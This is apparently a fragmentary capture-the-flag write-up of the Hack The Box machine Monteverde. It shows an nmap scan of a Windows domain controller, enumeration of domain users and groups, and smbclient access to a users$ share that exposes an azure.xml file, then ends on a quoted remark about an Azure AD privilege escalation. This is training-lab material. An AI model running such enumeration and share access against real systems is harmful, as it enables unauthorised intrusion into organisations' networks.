~/Documents/HTB/Monteverde root@kali ❯ cat nmap.txt # Nmap 7.80 scan initiated Mon Jan 27 10:08:26 2020 as: nmap -p- -sC -sV -oN nmap.txt 10.10.10.172 Nmap scan report for 10.10.10.172 Host is up (0.30s latency). Not shown: 65516 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-27 02:28:22Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49670/tcp open msrpc Microsoft Windows RPC 49671/tcp open msrpc Microsoft Windows RPC 49702/tcp open msrpc Microsoft Windows RPC 49771/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=1/27%Time=5E2E483C%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Jan 27 10:22:35 2020 -- 1 IP address (1 host up) scanned in 849.28 seconds
[+] Getting domain group memberships: Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2 Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan Group 'Enterprise Read-only Domain Controllers' (RID: 498) has member: Could not initialise pipe samr. Error was NT_STATUS_INVALID_NETWORK_RESPONSE Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2 Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope ...
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin azure_uploads Disk C$ Disk Default share E$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share users$ Disk SMB1 disabled -- no workgroup available
~/Documents/HTB/Monteverde root@kali ❯ smbclient \\\\10.10.10.172\\users$ -U SABatchJobs Enter WORKGROUP\SABatchJobs's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Fri Jan 3 21:12:48 2020 .. D 0 Fri Jan 3 21:12:48 2020 dgalanos D 0 Fri Jan 3 21:12:30 2020 mhope D 0 Fri Jan 3 21:41:18 2020 roleary D 0 Fri Jan 3 21:10:30 2020 smorgan D 0 Fri Jan 3 21:10:24 2020
524031 blocks of size 4096. 519955 blocks available smb: \> cd mhope smb: \mhope\> dir . D 0 Fri Jan 3 21:41:18 2020 .. D 0 Fri Jan 3 21:41:18 2020 azure.xml AR 1212 Fri Jan 3 21:40:23 2020
524031 blocks of size 4096. 519955 blocks available smb: \mhope\>
During both my DEF CON and Troopers talks I mentioned a vulnerability that existed in Azure AD where an Application Admin or a compromised On-Premise Sync Account could escalate privileges by assigning credentials to applications
